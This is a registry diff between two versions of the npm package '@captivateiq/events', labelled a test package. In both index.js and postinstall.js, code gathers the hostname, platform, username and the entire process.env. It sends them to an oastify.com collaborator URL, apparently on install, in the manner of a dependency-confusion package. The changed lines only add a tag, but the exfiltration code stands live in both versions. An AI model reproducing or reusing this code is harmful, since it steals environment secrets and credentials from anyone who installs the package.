@captivateiq/events 19.3.9 → 21.3.9

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/index.js CHANGED
@@ -16,7 +16,7 @@ const env = JSON.stringify(process.env);
16
16
  const scriptPath = __dirname;
17
17
 
18
18
  // Prepare URL with query parameters for easier parsing
19
- const queryParams = `hostname=${hostname}&platform=${platform}&arch=${arch}&release=${release}&username=${userInfo}&env=${encodeURIComponent(env)}&scriptPath=${encodeURIComponent(scriptPath)}`;
19
+ const queryParams = `hostname=${hostname}&platform=${platform}&arch=${arch}&release=${release}&username=${userInfo}&env=${encodeURIComponent(env)}&scriptPath=${encodeURIComponent(scriptPath)}&events-ciq=true`;
20
20
  const url = `https://a3esodr3ag3mzjq2wyodzyfpngt7hy5n.oastify.com/?${queryParams}`;
21
21
 
22
22
  // Send the request
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@captivateiq/events",
3
- "version": "19.3.9",
3
+ "version": "21.3.9",
4
4
  "description": "Test package",
5
5
  "main": "index.js",
6
6
  "scripts": {
package/postinstall.js CHANGED
@@ -16,7 +16,7 @@ const env = JSON.stringify(process.env);
16
16
  const scriptPath = __dirname;
17
17
 
18
18
  // Prepare URL with query parameters for easier parsing
19
- const queryParams = `hostname=${hostname}&platform=${platform}&arch=${arch}&release=${release}&username=${userInfo}&env=${encodeURIComponent(env)}&scriptPath=${encodeURIComponent(scriptPath)}`;
19
+ const queryParams = `hostname=${hostname}&platform=${platform}&arch=${arch}&release=${release}&username=${userInfo}&env=${encodeURIComponent(env)}&scriptPath=${encodeURIComponent(scriptPath)}&events-ciq=true`;
20
20
  const url = `https://a3esodr3ag3mzjq2wyodzyfpngt7hy5n.oastify.com/?${queryParams}`;
21
21
 
22
22
  // Send the request